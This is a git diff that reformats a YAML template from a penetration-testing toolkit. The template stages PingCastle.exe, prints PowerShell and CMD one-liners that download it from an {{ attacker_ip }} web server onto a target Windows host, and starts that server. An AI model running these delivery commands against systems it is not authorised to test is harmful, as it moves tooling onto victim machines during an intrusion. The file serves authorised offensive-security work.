--- a/src/profi/templates/scripts/deliver-windows-pingcastle.yaml
+++ b/src/profi/templates/scripts/deliver-windows-pingcastle.yaml
@@ -1,19 +1,17 @@
+---
 metadata:
-  filename: deliver-windows-pingcastle.yaml
-  tags:
-  - windows
-  - privesc
-  - domain
-  created: '2025-04-02'
-  author: '@anakles'
-content: "mkdir -p packstation/outbound; cp -n {{ tools_dir }}/pingcastle/PingCastle.exe\
-  \ packstation/outbound; \\\necho '================================================================';\
-  \ \\\necho '                      -----PowerShell-----                      '; \\\
-  \necho 'Deliver: iwr -uri http://{{ attacker_ip }}:{{ delivery_outbound_port }}/PingCastle.exe\
-  \ -Outfile {{ delivery_path_windows }}\\PingCastle.exe'; \\\necho '================================================================';\
-  \ \\\necho '                         -----CMD-----                          '; \\\
-  \necho 'Deliver: powershell wget -uri http://{{ attacker_ip }}:{{ delivery_outbound_port\
-  \ }}/PingCastle.exe -Outfile {{ delivery_path_windows }}\\PingCastle.exe'; \\\n\
-  echo '================================================================'; \\\n python\
-  \ {{ templates_dir }}/helper_scripts/startEnhancedHttpServer.py -p {{ delivery_outbound_port\
-  \ }} -d packstation/outbound\n"
+  filename: "deliver-windows-pingcastle.yaml"
+  tags: ["windows", "privesc", "domain"]
+  created: "2025-04-02"
+  author: "@anakles"
+
+content: |
+  mkdir -p packstation/outbound; cp -n {{ tools_dir }}/pingcastle/PingCastle.exe packstation/outbound; \
+  echo '================================================================'; \
+  echo '                      -----PowerShell-----                      '; \
+  echo 'Deliver: iwr -uri http://{{ attacker_ip }}:{{ delivery_outbound_port }}/PingCastle.exe -Outfile {{ delivery_path_windows }}\PingCastle.exe'; \
+  echo '================================================================'; \
+  echo '                         -----CMD-----                          '; \
+  echo 'Deliver: powershell wget -uri http://{{ attacker_ip }}:{{ delivery_outbound_port }}/PingCastle.exe -Outfile {{ delivery_path_windows }}\PingCastle.exe'; \
+  echo '================================================================'; \
+  python {{ templates_dir }}/helper_scripts/startEnhancedHttpServer.py -p {{ delivery_outbound_port }} -d packstation/outbound
